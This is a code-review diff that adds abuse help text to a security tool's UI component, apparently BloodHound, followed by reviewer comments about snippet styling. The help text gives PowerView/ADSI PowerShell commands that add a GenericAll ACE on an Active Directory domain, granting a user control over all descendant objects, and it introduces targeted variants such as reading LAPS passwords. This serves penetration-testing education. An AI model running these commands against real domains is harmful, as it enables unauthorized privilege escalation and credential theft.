packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx

```diff
@@ -423,13 +423,132 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
+                        more control over the ACE we add to the domain object.
+                    </Typography>
+
+                    <Typography variant='body2'>
+                        Next, we will fetch the GUID for all objects. This should be
+                        '00000000-0000-0000-0000-000000000000':
+                    </Typography>
+
+                    <Typography component={'pre'}>
+                        {'$Guids = Get-DomainGUIDMap\n' +
+                            "$AllObjectsPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'All'} | select -ExpandProperty name"}
+                    </Typography>
+
+                    <Typography variant='body2'>
+                        Then we will construct our ACE. This command will create an ACE granting the "JKHOLER" user full
+                        control of all descendant objects:
+                    </Typography>
+
+                    <Typography component={'pre'}>
+                        {
+                            "$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity 'JKOHLER' -Right GenericAll -AccessControlType Allow -InheritanceType All -InheritedObjectType $AllObjectsPropertyGuid"
+                        }
+                    </Typography>
+
+                    <Typography variant='body2'>Finally, we will apply this ACE to the domain:</Typography>
+
+                    <Typography component={'pre'}>
+                        {'$DomainDN = "DC=dumpster,DC=fire"\n' +
+                            '$dsEntry = [ADSI]"LDAP://$DomainDN"\n' +
+                            "$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'\n" +
+                            '$dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)\n' +
+                            '$dsEntry.PsBase.CommitChanges()'}
+                    </Typography>
+
+                    <Typography variant='body2'>
+                        Now, the "JKOHLER" user will have full control of all descendent objects of each type.
+                    </Typography>
+
+                    <Typography variant='body1'>Targeted Descendent Object Takeoever</Typography>
+
+                    <Typography variant='body2'>
+                        If you want to be more targeted with your approach, it is possible to specify precisely what
+                        right you want to apply to precisely which kinds of descendent objects. You could, for example,
+                        grant a user "ForceChangePassword" permission against all user objects, or grant a security
+                        group the ability to read every GMSA password under a certain OU. Below is an example taken from
+                        PowerView's help text on how to grant the "ITADMIN" user the ability to read the LAPS password
+                        from all computer objects in the "Workstations" OU:
+                    </Typography>
+
+                    <Typography component={'pre'}>
```

Comment:
These lengthy code snippets might look nicer if you use the recently created `CodeController` component like in ADCSESC4 abuse sections.

Reply:
Gotcha. Will check that out!

Reply:
Hmm.. It does look nicer with the code snippet style you have used ADCSESC4. I wonder if we should use for all code snippets everywhere to have consistent style? It is less relevant for one-liner commands though. Perhaps we should have a discussion with Ryan about it? If so, then we can create another ticket for that effort I guess.